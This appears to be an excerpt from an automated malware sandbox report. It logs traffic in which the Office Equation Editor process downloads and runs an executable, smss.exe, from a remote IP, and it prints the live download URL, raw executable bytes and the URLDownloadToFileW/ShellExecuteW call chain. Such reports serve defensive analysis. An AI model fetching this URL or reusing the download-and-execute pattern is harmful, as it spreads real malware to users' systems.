    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: Joe Sandbox ViewASN Name: FARIYA-PKFariyaNetworksPvtLtdPK FARIYA-PKFariyaNetworksPvtLtdPK
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 16 Oct 2023 07:58:22 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34Last-Modified: Mon, 16 Oct 2023 00:46:09 GMTETag: "136c20-607cabb6cc4a3"Accept-Ranges: bytesContent-Length: 1272864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad f1 28 81 e9 90 46 d2 e9 90 46 d2 e9 90 46 d2 2a 9f 19 d2 eb 90 46 d2 e9 90 47 d2 77 90 46 d2 2a 9f 1b d2 e6 90 46 d2 bd b3 76 d2 e3 90 46 d2 2e 96 40 d2 e8 90 46 d2 52 69 63 68 e9 90 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e3 d4 f6 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 00 00 00 d0 01 00 00 04 00 00 35 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 c0 05 00 00 04 00 00 f5 11 14 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 74 00 00 a0 00 00 00 00 a0 03 00 08 1d 02 00 00 00 00 00 00 00 00 00 08 54 13 00 18 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7d 5f 00 00 00 10 00 00 00 60 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3e 12 00 00 00 70 00 00 00 14 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 a8 01 00 00 90 00 00 00 04 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 08 1d 02 00 00 a0 03 00 00 1e 02 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: GET /S1510M/smss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.72.68.128Connection: Keep-Alive
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035303C0 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035303C0
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: unknownTCP traffic detected without corresponding DNS query: 103.72.68.128
    Source: EQNEDT32.EXE, 00000002.00000002.413445105.000000000065F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.477317406.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.72.68.128/S1510M/smss.exe
    Source: EQNEDT32.EXE, 00000009.00000002.477317406.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.72.68.128/S1510M/smss.exeeanO
    Source: EQNEDT32.EXE, 00000002.00000002.413445105.000000000065F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.477317406.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.72.68.128/S1510M/smss.exeiiC:
    Source: EQNEDT32.EXE, 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.477890729.00000000035F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.72.68.128/S1510M/smss.exej
